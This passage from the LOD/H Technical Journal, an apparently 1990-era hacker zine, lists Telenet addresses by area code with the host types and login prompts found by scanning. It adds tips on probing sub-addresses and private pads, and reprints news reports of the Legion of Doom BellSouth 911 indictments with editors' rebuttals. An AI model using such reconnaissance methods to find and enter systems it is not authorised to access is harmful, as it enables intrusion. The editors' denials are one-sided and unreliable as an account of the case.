608--WISCONSIN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS 35 enter logon command $ 140 ID * 141 609--NEW JERSEY--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 23 enter class $ 26 UNSUPPORTED FUNCTION 42 Dow Jones 46 Dow Jones $ 47 HP-3000 $ 61 UC $ 63 UC $ 68 UC $ 73 100 PRIME 124 $ 125 HP-3000 $ 126 UC $ 132 PRIME MOORES $ 136 Twain Terminal Server 138 PRIME HCIONE $ 141 UNSUPPORTED FUNCTION $ 145 ID 170 PRIME * 171 $ 172 UC 232a MHP2021 APPLICATION: 242 Dow Jones 243 Dow Jones 244 Dow Jones 611--UNKNOWN--ADDRESSES SCANNED: 0-400 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 25 TRANSEND 26 " 27 " 28 " 39 CCF Development System 56 CCF Computing Facility 60 Nexnet 120 VAX 130 TOPS-20 F.A.S.T. 145 Good Evening,Please Logon: 150 PRIME MHT850 192 PRIME 193 PRIME 194 PRIME 195 PRIME 196 PRIME LDN 198 PRIME DEV2 234 235 MHCOMET 236 " 237 " 238 " 612--MINNESOTA--ADDRESSES SCANNED: 0-500 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 21a $ 22 PC Pursuit Dialer (2400) 23 WESTLAW $ 33 ID 34 WESTLAW 36 37 WESTLAW $ 44 AOS $ 46 CDCNET $ 52 PRIME * 53 56 WESTLAW 57 " $ 69 ID $ 70 AOS * 71 $ 120 PC Pursuit Dialer (300) $ 121 PC Pursuit Dialer (1200) $ 131 ID * 132 * 138 $ 139 VAX $ 162 PRIME PIERRE * 231 * 232 * 233 AOS 236 240 MSC X.25 Gateway * 251 * 252 $ 260 CDCNET 270 WESTLAW 271 " * 332 * 333 $ 340 AOS $ 351 AOS 356 WESTLAW 357 " 358 " 359 " 362 " 363 " 364 " 365 " 366 " 367 " 369 " 385 391 WESTLAW 393 " * 430 442 please LOGIN 614--OHIO--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 ID * 36 * 130 $ 131 AOS * 132 615--TENNESSEE--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 ID $ 32 $ 33 PRIME FRKFRT $ 34 AOS * 36 * 50 * 55 139a Telenet Async to 3270 616--MICHIGAN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS 45 VAX ACTEST $ 50 $ 51 58 MHP201A 63 Meridian 617--MASSACHUSETTS--ADDRESSES SCANNED: 0-1100 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 20 PRIME PBN27 22 PRIME BDSD * 26 * 29 $ 30 GS/1 37 PRIME BDSH 46 PRIME BDSS $ 47 ENTER ACCESS PASSWORD: 48 VAX * 51 $ 56 * 61a $ 64 PRIME OPS 67 PRIME IRI System 1 72 PRIME IRI System 2 74 PRIME ENB * 78 * 114 * 115 143 IDC/370 147 HP-3000 152 ENTER LOGON * 153 158 PRIME BDSW 164 169 201 205 AOS MONARCH 206 226 VM/370 * 230 236 VAX Thompson Financial Network 237 UNIX b1cs4 249 Decserver 250 NDNA 255 PRIME PBN43 256 MGS Teaching Program * 266 270 VAX SNOOPY 273 enter system id * 274 291 $ 311 PC Pursuit Dialer (300) $ 313 PC Pursuit Dialer (1200) 330 VAX * 336 $ 341 VAX $ 347 HP-3000 349 350 PRIME PBN39 351 PRIME BDSU 352 PRIME OASB 354 VAX Anchor Comm. Router 359 VAX HEWEY * 371 * 372 379 $$ 4200 MODEL: 380 PRIME L01 381 PRIME P01 382 PRIME Y01 383 PRIME H02 387 PRIME B01 388 $$ 4200 MODEL: 391 PRIME P01 393 PRIME Y04 398 PRIME V03 437 HP-3000 443 IDC/370 446 PRIME ENO 447 PRIME ENL 451 452 PRIME NET 454 PRIME NORTON 457 PRIME NNEB 476 PRIME NNEB * 460 * 465 491 PRIME ROCH 492 PRIME MELVLE 493 PRIME STMFRD 499 PRIME SYRA 501 PRIME OASC 502 PRIME APPLE 510 PRIME EN.C06 515 UNIX 516 PRIME PBN38 517 PRIME PBN38 518 PRIME BDSA 519 PRIME PBN54 520 PRIME PBN57 525 PRIME IRI System 8 530 Maxlink 541 PRIME BDSS 543 PRIME PBN37 550 PRIME B01 551 PRIME CSP-A 553 PRIME BDSQ 556 PRIME 558 PRIME CSSS.A 560 PRIME BDSN 562 PRIME BDS2 563 PRIME 568 PRIME OASI 575 PRIME PBN50 577 PRIME B30 578 PRIME B04 583 PRIME MD.HFD 587 PRIME TR.SCH * 588 $ 589 * 590 591 PRIME EN.M19 593 PRIME BDSO 596 PRIME MKT 597 PRIME BDSB 599 PRIME OASJ 618 UNIX * 623 641 AOS Timeplace Inc. 649 PAPERCHASE 654 PRIME IRI System 9 710 PRIME MD.ATC 711 PRIME AESE01 713 PRIME PEACH 716 PRIME WAYNE 717 PRIME ETHEL 718 PRIME BUGS 722 PRIME PBN31 723 PRIME MD.NJ 724 PRIME NYMCS 725 PRIME PRNCTN 726 PRIME NJCENT 736 VAX Butterworths 737 VAX " $ 840 PRIME WALTHM 850 PRIME MD-CHI 851 PRIME PBN30 852 PRIME MD.LP1 855 PRIME TRNG.C 856 PRIME CS.CHI 857 PRIME CS.OAK 858 PRIME CS-DEN 859 PRIME AWCE02 861 PRIME PTCDET 862 PRIME DRBN1 864 PRIME CS.DET 865 PRIME MD.DET 866 PRIME MD.DAC 867 PRIME ACEC01 868 PRIME MD.GR 870 PRIME CS.IND 871 PRIME MD.IND 872 PRIME MD.PIT 873 PRIME ACMC01 874 PRIME PITTCS 875 PRIME MD.CLE 902 PRIME MD.HOU 905 PRIME OASG 908 PRIME WMCS 910 PRIME CSWDC 911 PRIME VIENNA 912 PRIME BALT 928 PRIME CS.HOU 930 PRIME MD.AUS 931 PRIME CS.SCR 937 PRIME TRNED 957 PRIME ZULE 958 PRIME EDOC1 959 PRIME FUZZY 962 PRIME PBN49 * 971 * 972 * 973 * 974 980 PRIME WUFPAK 981 PRIME WMMKT 986 993 CU-Manchester- 995 PRIME ATC55 996 PRIME PBN65 998 PRIME TRNGB 3088 VAX DELPHI 619--CALIFORNIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 31 Environment Ctrl Monitor 41 VM/370 * 51 56 57 $ 62 AOS $ 63 AOS 626--UNKNOWN--ADDRESSES SCANNED: VARIOUS $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 1000 PRIME $ 1002 VAX Pacific Gas & Electric 703--VIRGINIA--ADDRESSES SCANNED: 0-1300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 32 $ 33 AOS 40 VAX 41 VAX $ 42 ENTER USERID: 44 AOS Project HOPE $ 53 HP-3000 55 ENTER SWITCH CHARS 141 enter /login 142 " 160 VAX 163a $ 168 * 176 $ 177 AOS * 206 * 207 $ 253 AOS $ 254 AOS $ 255 AOS $ 256 AOS $ 257 AOS $ 262 AOS * 340 * 341 * 342 $ 344 ** NETWORK SIGN-ON FAILED: * 346 367 P.R.C. 371 P.R.C. * 377 431 TACL 1> * 460 * 461 $ 463 DEC-20 * 464 $ 466 DEC-20 * 467 $ 468 $ 469 Decserver * 470 511 bcs network 512 bcs network 530 bcs network $ 1000 FCC FIRSTRA' $ 1001 FCC FIRSTRA' 704--NORTH CAROLINA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 31 AOS $ 32 AOS * 60 * 61 * 62 $ 63 AOS * 64 * 168 170 171 173 707--CALIFORNIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 48 AOS $ 49 AOS $ 50 AOS $ 51 AOS $ 52 AOS 711--UNKNOWN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 15 PRIME 713--TEXAS--ADDRESSES SCANNED: 0-500 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 24 PC Pursuit Dialer (2400) * 42 $ 43 ID $ 44 ID * 58 73 PRIME TXNODE 76 %u@IUeASID@cAbR@CUDEz 77 " 79 " 80 " 81 " $ 113 PC Pursuit Dialer (300) $ 114 PC Pursuit Dialer (1200) 146 %u@IUeASID@cAbR@CUDEz * 167 * 224 * 227 * 228 * 232 * 234 $ 238 HP-3000 239 Compaq 255 PRIME SYS1 $ 260 PRIME HOUSTN 276 * 335 336 PRIME GANODE 340a 345 COMM520 346a Telenet Async to 3270 $ 364 VAX 366 PRIME CANODE 368 PRIME MANODE $ 371 Coca-Cola Foods 431 714--CALIFORNIA--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 4 PC Pursuit Dialer (2400) $ 23 PC Pursuit Dialer (300) $ 24 PC Pursuit Dialer (1200) $ 33 911 Monitor ECM $ 41 AGS 48 PRIME TWCALF 49 SERVICE ID= $ 55 HP-3000 $ 62 AOS $ 63 AOS $ 64 AOS $ 65 AOS $ 66 AOS $ 67 AOS $ 68 AOS 72 PRIME FSCOPE $ 102 PC Pursuit Dialer (2400) $ 119 PC Pursuit Dialer (300) $ 121 PC Pursuit Dialer (1200) $ 130 MMSA 131 PRIME CAJH * 133 * 145 $ 160 HP-3000 * 164 166 HP-3000 * 167 * 168 * 169 171 COMMAND UNRECOGNIZED 172 " * 178 $ 210 PC Pursuit Dialer (300) $ 213 PC Pursuit Dialer (1200) $ 240 AOS 246 COMMAND UNRECOGNIZED $ 272 AOS * 273 $ 274 AOS $ 275 AOS $ 276 AOS 716--NEW YORK--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 23 enter user code please 25 " 31 HP-3000 50 130 enter logon request- 131 " 133 " $ 135 VAX 717--PENNSYLVANIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 8 VM/370 * 24 * 31 * 32 * 33 * 34 40 PRIME IREX 42 PRIME IREX 45 VOS 46 VOS 47 Camp Hill Mgt. Info Center 48 " 50 51 Telenet Async to 3270 52a Telenet Async to 3270 53 * 150 * 153 * 154 * 160 * 161 * 162 * 163 801--UTAH--ADDRESSES SCANNED: 0-500 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 12 PC Pursuit Dialer (2400) $ 20 PC Pursuit Dialer (300) $ 21 PC Pursuit Dialer (1200) 24 Wasatch System 25 " 26 " 27 " $ 35 ID * 37 $ 39 AOS $ 44 AOS $ 49 AOS $ 52 AOS $ 54 VAX $ 57 AOS $ 60 AOS $ 62 AOS $ 65 AOS $ 130 AOS 144 * 150 $ 151 AOS * 152 $ 153 AOS 176 $ 231 AOS $ 232 AOS $ 239 AOS 250 ID?> 257 258 802--VERMONT--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 31 AOS $ 32 AOS $ 33 ID * 35 * 36 $ 37 AOS $ 38 AOS 803--SOUTH CAROLINA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 30 * 32 $ 50 $ 51 KEMET ELECTRONICS * 55 60 Telenet Async to 3270 61a Telenet Async to 3270 $ 70 AOS * 71 * 74 $ 77 AOS 131 Kemet 132a Telenet Async to 3270 * 133 $ 135 PRIME PRISM 804--VIRGINIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 35 VAX * 43 * 45 $ 60 ID * 61 * 62 * 155 $ 160 AOS 805--CALIFORNIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS 50 VAX 51 VAX * 58 * 59 * 60 * 61 * 62 * 63 * 64 * 65 * 74 90 100 101 UNIX salt.acc.com 130 150 PRIME MBM 808--HAWAII--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 40 VAX 100 PRIME 811--GTE--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 15 17 HP-3000 21 UNIX GTE RPU2 22 UNIX GTE IPU 24 UNIX GTE RPU1 25 TACL 1> 28 TACL 1> 118 CANNOT EXEC! 123 HP-3000 * 129 * 143 * 217 * 219 812--INDIANA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS 813--FLORIDA--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 PC Pursuit Dialer (300) $ 21 PC Pursuit Dialer (1200) * 33 35 PRIME S9750 43 ** 4200 TERMINAL TYPE: $ 52 DEC-20 Price Waterhouse $ 53 VAX $ 55 PRICE WATERHOUSE $ 59 Telenet Async to 3270 73 VM/370 74 ** 4200 TERMINAL TYPE: * 76 $ 124 PC Pursuit Dialer (2400) 131 IBM INFORMATION SERVICES 143 " 147 " * 148 * 151 * 153 * 154 160 VAX 161 VAX 164 VAX * 165 166a Telenet Async to 3270 * 167 $ 169 GS/1 172 IBM INFORMATION SERVICES 174 " 210 214 215 218 * 222 $ 225 ----SECURITY SUBSYSTEM---- $ 226 " * 265 267 IBM INFORMATION SERVICES $ 268 U#= 269a VAX Addidas 271 Access Code: 272 PRIME 275 Access Code: 277 U#= * 330 344 TACL 1> 346 " 350 VAX * 351 355 * 360 * 361 430 Telenet Async to 3270 431a Telenet Async to 3270 436 U#= 438 VAX DEC/ETONIC * 460 465 Martin Marietta 466 Martin Marietta 467 Enter Switch Characters 468 " 660 814--PENNSYLVANIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 50 PRIME SYSA * 53 $ 130 VAX $ 137 AOS 816--MISSOURI--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 36 * 38 * 43 $ 44 AOS * 45 $ 57 AOS $ 58 AOS * 59 $ 62 77 $ 104 PC Pursuit Dialer (300) $ 113 PC Pursuit Dialer (1200) $ 150 * 157 * 161 189 CDCNET 817--TEXAS--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 33 $ 35 PRIME FWRTH * 36 * 37 141 VAX Tandy Information Service * 160 * 161 * 162 818--CALIFORNIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 20 $ 21 PC Pursuit Dialer (1200) * 29 * 50 $ 130 * 139 888--GTE HAWAIIAN TELEPHONE--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 25 $ 51 * 52 $ 53 PRIME HAWAII * 30 * 45 * 50 890--UNKNOWN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 100 ADTN USER ID $ 102 " $ 103 " $ 109 GS/1 $ 110 ADTN USER ID $ 125 " $ 126 " $ 129 " 901--TENNESSEE--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 30 * 134 904--FLORIDA--ADDRESSES SCANNED: 0-400 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 34 AOS $ 41 AOS $ 45 AOS $ 50 AOS 51 COMMAND UNRECOGNIZED 52 COMMAND UNRECOGNIZED 53 COMMAND UNRECOGNIZED $ 55 AOS $ 56 AOS $ 58 ID * 60 141 * 160 * 161 232 * 235 907--ALASKA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 31 ID * 32 $ 33 AOS * 34 $ 35 AOS $ 44 $ 45 AOS * 46 $ 47 AOS $ 48 AOS * 50 * 51 $ 130 AOS 138 909--TELENET--ADDRESSES SCANNED: 0-1000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 3 Telenet Port 8 PRIME 9 PRIME 10 PRIME 12 PRIME 13 14 Telenet Port 23 PRIME 26 PRIME 27 PRIME 38 PRIME 39 USER ID 44 PRIME 52 53 PRIME 54 56 PRIME 60 PRIME 61 PRIME 62 PRIME 63 PRIME 65 PRIME 73 PRIME 77 PRIME 78 PRIME 79 MHP201A 90 PRIME 92 PRIME 94 PRIME 95 PRIME 97 PRIME 98 PRIME 100 PRIME 101 USER ID 102 USER ID 104 117 PRIME 123 PRIME 130 PRIME 131 PRIME 136 PRIME 137 PRIME 139 PRIME 141 PRIME 143 PRIME 144 PRIME 146 PRIME Telemail 147 PRIME " 148 PRIME " 149 PRIME " 151 153 TACL 1> 154 " 155 PRIME Telemail 158 PRIME " 159 PRIME " 160 PRIME " 161 PRIME " 162 PRIME 165 PRIME Telemail 168 PRIME " * 170 171 172 173 PRIME 176 PRIME 178 USER ID 179 " 184 " 187 197 198 205 PRIME 206 PRIME 235 PRIME 236 PRIME 239 PRIME $ 312 !Load and Function Tester $ 314 " 316 " $ 317 " 318 " 319 " 325 328 !Load and Function Tester 330 FRAME TESTER? 338 !Load and Function Tester 400 PRIME Telemail 401 PRIME " 403 PRIME " 404 PRIME " 406 PRIME " 407 PRIME 408 PRIME 409 PRIME 508 PRIME 600 VAX 615 PRIME 622 PRIME 623 PRIME 624 PRIME 626 PRIME 627 PRIME 628 PRIME 629 PRIME 630 PRIME 631 PC Pursuit BBS 632 633 634 635 643 PRIME 646 650 PRIME 651 PRIME 656 657 658 659 660 661 663 664 675 PRIME 676 PRIME 677 PRIME 678 PRIME 679 PRIME 680 PRIME 686 Telenet FE BBS1 747 751 TELENET MUS/XA NETWORK 761 PRIME Telemail 762 PRIME 763 PRIME 764 Telenet Async to 3270 767 TELENET NUS/XA NETWORK 770 PRIME 772 PRIME 773 PRIME 777 Telenet Async to 3270 779 " 781 " 782 " 784 " 798 PRIME 799 PRIME 800 PRIME 801 PRIME 805 PRIME 810 PRIME 811 PRIME 815 PRIME 816 PRIME 817 PRIME 818 PRIME 819 PRIME 822 PRIME 823 PRIME 824 PRIME 825 PRIME 826 PRIME 827 PRIME 828 PRIME 830 PRIME 831 PRIME 832 PRIME 833 PRIME 834 PRIME 840 PRIME Telemail 841 PRIME " 842 PRIME " 843 PRIME " 844 PRIME " 845 PRIME " 846 847 848 PRIME Telemail 893 PRIME 894 PRIME 900 PRIME 901 PRIME 902 PRIME 911 PRIME 912 PRIME 910--TELENET--ADDRESSES SCANNED: VARIOUS $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 100 PRIME 200 PRIME 300 PRIME 400 PRIME 500 PRIME 912--GEORGIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 30 * 31 913--KANSAS--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 32 ID * 34 $ 150 PRIME TOPEKA 914--NEW YORK--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 32 VM/370 33 VM/370 34 >> 35 >> * 38 $ 41 VM/370 Pepsi * 42 50 Mnematics 133 * 160 916--CALIFORNIA--ADDRESSES SCANNED: 0-700 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 7 PC Pursuit Dialer (2400) $ 11 PC Pursuit Dialer (300) $ 12 PC Pursuit Dialer (1200) $ 30 AOS $ 33 AOS $ 34 PRIME SACRA $ 36 ID $ 39 AOS $ 40 AOS $ 41 ID 55 PRIME FIMSAC $ 56 AOS $ 57 AOS $ 58 AOS $ 59 AOS $ 63 AOS $ 64 AOS $ 130 AOS $ 131 AOS $ 132 AOS $ 133 AOS $ 134 AOS $ 141 AOS $ 168 AOS * 169 * 171 $ 232 AOS $ 233 AOS * 234 $ 235 AOS $ 236 AOS 240 268 Telenet Async to 3270 * 330 * 331 * 332 * 333 * 334 * 335 * 336 * 337 * 338 * 339 350 * 360 * 361 * 362 * 363 * 364 * 365 * 366 * 367 * 368 * 369 $ 530 * 531 607 UNIX IPA State Net 608 UNIX IPA State Net 918--OKLAHOMA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 ID 40 CUSTOMER ID: 105 American Airlines 130 American Airlines 919--NORTH CAROLINA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 PC Pursuit Dialer (300) $ 21 PC Pursuit Dialer (1200) $ 33 ID $ 34 AOS * 36 * 38 43 enter system id 44 " 46 " 47 VM/370 Northern Telcom * 58 $ 59 AOS * 60 $ 70 HP-3000 $ 124 PC Pursuit Dialer (2400) $ 130 HP-3000 135 USA TODAY Sports Center * 139 $ 145 * 158 * 159 MNEMONIC ADDRESSES ------------------ $ AFS APPLE BCS BIONET BLUE BRS CCC03 CMS $ COM D30 D31 D32 D33 D34 D35 D36 D37 D41 D42 D43 D44 D45 D46 D50 D51 D52 D53 D54 D55 D56 D57 D58 D61 D62 D63 D64 DELPHI DOW DUNS EIES GOLD GTEM HHTRAN INFO IRIS MMM MUNI NASA NET NSF OAG OLS ORBIT PORTAL PRIME S10 S11 S12 S13 S14 S15 S16 S17 S18 S19 SIS SIT SPR STK1 STK2 STK3 STK4 SUMEX USIBM USPS VUTEXT PC-PERSUIT DIALERS ------------------ C D/CITY/BAUD,ID,PASSWORD A/C CITY --- ----- 201 NJNEW 202 DCWAS 203 CTHAR 206 WASEA 212 NYNYO 213 CALAN 214 TXDAL 215 PAPHI 216 OHCLV 303 CODEN 305 FLMIA 312 ILCHI 313 MIDET 314 MOSLO 404 GAATL 408 CASJO 414 WIMIL 415 CAPAL 415 CASFA 503 ORPOR 602 AZPHO 612 MNMIN 617 MABOS 619 CASAD 713 TXHOU 714 CARIV 714 CASAN 801 UTSLC 813 FLTAM 816 MOKAN 818 CAGLE 916 CASAC 919 NCRTP TELENET SCANNING TIPS -------------------- There are a few things to take into consideration when using Telenet. First of all, ignore error messages! When something says rejecting, or illegal address, or remote procedure error, try it again using sub- addresses. (IE: 100100a, 100100b...100100.99) I have also found that some addresses that are rejecting merely require that you connect to it using an id. Many of the things that respond with illegal address are telenet pads. Most of the public pads are in the following ranges: 0-20, 80-100, 180-190. Many times you will find private pads. If you are very, very lucky you will find that pad-to-pad connections are possible to these privately owned pads. However, most of the time they are not operating, so your chances of actually picking anything up are very slim. When I did this directory I only checked the first few sub addresses on addresses that didn't immediately connect, so needless to say there are still a vast amount of systems out there. One address I have responds with rejecting until you connect to the sub address 74! Imagine trying to go that far on each of the thousands of rejecting and illegal addresses I obtained in my scanning! Maybe some other time. There are several areas that I scanned that are not in this directory. Mainly, these are areas where I didn't find anything. So you don't waste your time, all hosts in Canada are served through Datapac, so there is nothing in areas prefixed with a Canadian area code. There are also many US areas that I guess are still striving for the Industrial Revolution, and therefore have no systems online. There are also several privately owned prefixes that I didn't scan just because it would be a pain in the ass, above and beyond the pain involved doing the main scanning. The major ones are 622 (NYNEX), 891, 892, 893, & 894 (OWNERS UNKNOWN). There are also a few others that go up and down daily, depending upon their mood. I wouldn't suggest that you all immediately start hacking these prefixes; mainly because you will need an ID just to get a response other than refused collect connection. Lastly, if anyone finds any errors in the directory, or finds anything I omitted, let me know, and I'll revise it. Also, if anyone would like a copy of the telix script I used to do this scanning, let me know. This was a bitch to do, but I think it was worth the trouble. The next update won't be for a year, as this should suffice for at least that long. ============================================================================== End of Second Half of LOD/H Telenet Directory, Rev. #5 ============================================================================== The LOD/H Technical Journal, Issue #4: File 10 of 10. NETWORK NEWS AND NOTES ---------------------- The Network News and Notes file contains reprints of articles that are of interest to the majority of our intended readers. In this installment we borrowed heavily from the CFCA (Communications Fraud Control Association) Communicator since the newsletter deals specifically with issues relevant to our readers. The CFCA is "a nonprofit educational organization founded in 1985 to help the telecommunications industry combat fraud." Overall, do not let the titles mislead you. Every article contains interesting and we hope useful information. Be sure to take the time and read into them before skipping. Some are a little old but better late than never. If anyone comes across any articles of interest, we would like to know about them. One more note, all comments within brackets [], are remarks made by one of the TJ editors. The first two articles, as was stated in the Introduction, relate the various trouble some noted members of the community ran into. ______________________________________________________________________________ Source: The Wall Street Journal Issue: Wednesday, February 7, 1990 Title: Computer Hackers Accused of Scheme Against BellSouth Author: Thomas M. Burton CHICAGO--Federal grand juries in Chicago and Atlanta indicted four computer hackers in an alleged fraud scheme that authorities said could potentially disrupt emergency "911" telephone service throughout nine Southern States. The men, alleged to be part of a closely knit cadre of computer hackers known as the Legion of Doom, gained access to the computer system, controlling telephone emergency service of BellSouth Corp., the Atlanta-based telecommunications giant. BellSouth, through two subsidiaries, oversees phone service in Alabama, Mississippi, Georgia, Tennessee, Kentucky, Louisiana, Florida, and the Carolinas. The Chicago indictment said members of the Legion of Doom are engaged in disrupting telephone service by entering a telephone company's computers and changing the routing of telephone calls. The hackers in the group also fraudulently obtain money from companies by altering information in their computers, the indictment said. The hackers transferred stolen telephone-computer information from BellSouth to what prosecutors termed a "computer bulletin board system" in Lockport, Ill. In turn, the men planned to publish the computer data in a hackers' magazine, the grand jury charged. -----EDITOR'S NOTES: As always, ignorance and falsehoods are abound in most articles of this nature. For the record, NO TELEPHONE SERVICE WAS INTENTIONALLY DISRUPTED DUE TO THE ACCUSED MEMBERS. Furthermore, NO MONEY FROM COMPANIES WAS EVER FRAUDULENTLY OBTAINED BY ALTERING INFORMATION IN THEIR COMPUTERS. These are the typical WILD accusations made by law enforcement and further distorted by the media in such cases. As for the bbs is Lockport, Ill. well it was simply a legitimate information storage and retrieval system used by many, many people for legitimate purposes of information exchange. It would be very time consuming for the operator of said system to check every file on the system as it was a UNIX based system with a lot of disk space. The hacker magazine stated above is simply Phrack, Inc. put out by Knight Lightning and Taran King. More comments after next article. _____________________________________________________________________________ Source: ComputerWorld Issue: 1990 Title: Babes in high tech toyland nabbed Author: Michael Alexander CHICAGO--- The U.S. Justice Department escalated its ware against computer crime last week with two indictments against members of an alleged computer hacker group, who are charged with stealing a copy of a 911 emergency computer program from BellSouth Telephone Co., among several other crimes. In a seven-count indictment returned in Chicago, Robert X, 20 also known as "The Prophet", is alleged to have used a computer to steal a copy of a computer program owned and used by BellSouth that controls emergency calls to the police, fire, ambulance and emergency services in cities throughout nine Southern states. According to the indictment, after X stole the program -- valued at $79,449 -- he uploaded it to a computer bulletin board. The Chicago indictment further alleges that Craig Y, 19, also known as "Knight Lightning" downloaded the 911 program to his computer at the University of Missouri in Columbia, Mo., and edited it for publication in "Phrack", a newsletter for computer hackers. X and Y allegedly intended to disclose the stolen information to other computer hackers so that they could unlawfully access and perhaps disrupt other 911 services, the Chicago indictment charged. In a second indictment returned in Atlanta, X and two others were charged with additional crimes related to BellSouth systems. All four hackers allegedly are members of the Legion of Doom, described in the indictments "as a closely knit group of about 15 computer hackers", in Georgia, Texas, Michigan and several other states. BellSouth spokesmen refused to say when or how the intrusion was detected or how a computer hacker was able to lift the highly sensitive and proprietary computer program. "Hopefully, the government's action underscores that we do not intend to view this as the work of a mischievous prankster playing in a high-tech toyland", one spokesman said. A source within BellSouth said that much of what the hacker took was documentation and not source code. "They did not disrupt any emergency telephone service, and we are not aware of any impact on our customers", the source said. William Cook, an assistant U.S. attorney in Chicago, declined to comment on whether 911 service was actually disrupted. "It is a matter of evidence,", he said. Cook also said that while the two hackers are charged with carrying out their scheme between December 1988 and February 1989, the indictment came after a year-long investigation. Though Cook refused to say how the hackers were discovered or caught, it is believed that after the initial penetration by one of the hackers, an intrusion task force was set up to monitor subsequent security breaches and to gather evidence against the hackers. If convicted on all counts, X faces a prison sentence of up to 32 years and a maximum fine of $222,000, and Y faces a prison sentence of 31 years and a maximum fine of $122,000. The Atlanta indictment charged Robert X, Adam Z, 22 known as "The Urvile" and also "Necron 99", and Frank XYZ, 23 known as "The Leftist", with eight counts each of computer fraud, wire fraud, access code fraud and interstate transportation of stolen property, among other crimes. If convicted, each defendant faces up to five years imprisonment and a $250,000 fine on each count. The three illegally accessed Bellsouth computers and obtained proprietary information that they distributed to other hackers, the indictment alleged. 